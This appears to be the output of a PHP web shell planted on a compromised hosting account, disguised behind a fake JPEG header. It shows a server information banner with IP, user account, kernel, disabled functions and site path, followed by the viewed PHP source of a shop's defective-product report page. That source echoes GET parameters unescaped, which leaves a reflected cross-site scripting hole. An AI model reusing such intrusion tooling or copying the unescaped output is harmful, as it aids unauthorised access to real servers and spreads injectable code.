���� JFIF aewtgwgerwasdasd
Server IP : 147.93.80.58 / Your IP : 216.73.216.195 Web Server : LiteSpeed System : Linux id-dci-web1866.main-hosting.eu 5.14.0-503.38.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Apr 18 08:52:10 EDT 2025 x86_64 User : u939086737 ( 939086737) PHP Version : 8.2.28 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : /home/u939086737/domains/aakashsolution.in/public_html/reports/ |
Upload File : |
<?php session_start(); if(isset($_SESSION['user'])){ $role=$_SESSION['role']; $user=$_SESSION['user']; $shop=$_SESSION['shop']; } else{ header("Location:../index.php"); echo "<script>location='../index.php'</script>"; } ?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Defective Report</title> <link href="../bootstrap/css/bootstrap.min.css" rel="stylesheet" /> <link href="../bootstrap/font-awesome-4.6.3/css/font-awesome.min.css" rel="stylesheet" /> <link href="../bootstrap/css/bootstrap.css" rel="stylesheet" media="screen" /> <style> </style> <script src="../bootstrap/js/jquery.js" type="text/javascript"></script> </head> <body> <?php include "../header.php";?> <div class="container"> <div class="row"> <?php if(isset($_SESSION['msg'])){echo "<h4 class='text-success text-center'>".$_SESSION['msg']."</h4>"; unset($_SESSION['msg']);} if(isset($_SESSION['err'])){echo "<h4 class='text-danger text-center'>".$_SESSION['err']."</h4>"; unset($_SESSION['err']);} ?> <div class="col-md-2" style="margin-top:50px;"> <?php include('sidebar.php'); ?> </div><!-- end of col-md-3 --> <div class="col-md-10"> <center><font size="+2">Defective Product Report</font></center><hr /> <div class="row"> <div class="col-md-4"> <input type="text" id="query" placeholder="Enter Invoice No or Model to Search" class="form-control" onkeyup="getInvoiceData(this.value)" value="<?php if(isset($_GET['query'])){echo $_GET['query'];} ?>" /> </div> <div class="col-md-3"><input type="date" id="from" class="form-control" value="<?php if(isset($_GET['from'])){echo $_GET['from'];} ?>" /></div> <div class="col-md-3"><input type="date" id="to" class="form-control" value="<?php if(isset($_GET['to'])){echo $_GET['to'];} ?>" /></div> <div class="col-md-2"><button type="button" class="btn btn-success" onclick="getDates();">Search <i class="fa fa-search"></i></button></div> </div><br /> <div class="row"> <div id="query_result" class="table-responsive col-md-12"> <?php include "defectivelist.php" ;?> </div> </div> </div> </div><!-- end of row --> </div><!-- end of container --> <script language="javascript"> function getInvoiceData(str){ var query=str; $('#from').val(''); $('#to').val(''); var shop='<?php echo $shop; ?>'; var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (xhttp.readyState == 4 && xhttp.status == 200) { document.getElementById("query_result").innerHTML = xhttp.responseText; } }; xhttp.open("GET", "defectivelist.php?query="+query+"&shop="+shop, true); xhttp.send(); } function getDates(){ var from=$('#from').val(); var to=$('#to').val(); $('#query').val(''); var shop='<?php echo $shop; ?>'; if(from=='' || to==''){ alert("Select Date Range!"); } else{ var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() { if (xhttp.readyState == 4 && xhttp.status == 200) { document.getElementById("query_result").innerHTML = xhttp.responseText; } }; xhttp.open("GET", "defectivelist.php?from="+from+"&to="+to+"&shop="+shop, true); xhttp.send(); } } </script> <script src="../bootstrap/js/bootstrap.min.js" type="text/javascript"></script> </body> </html>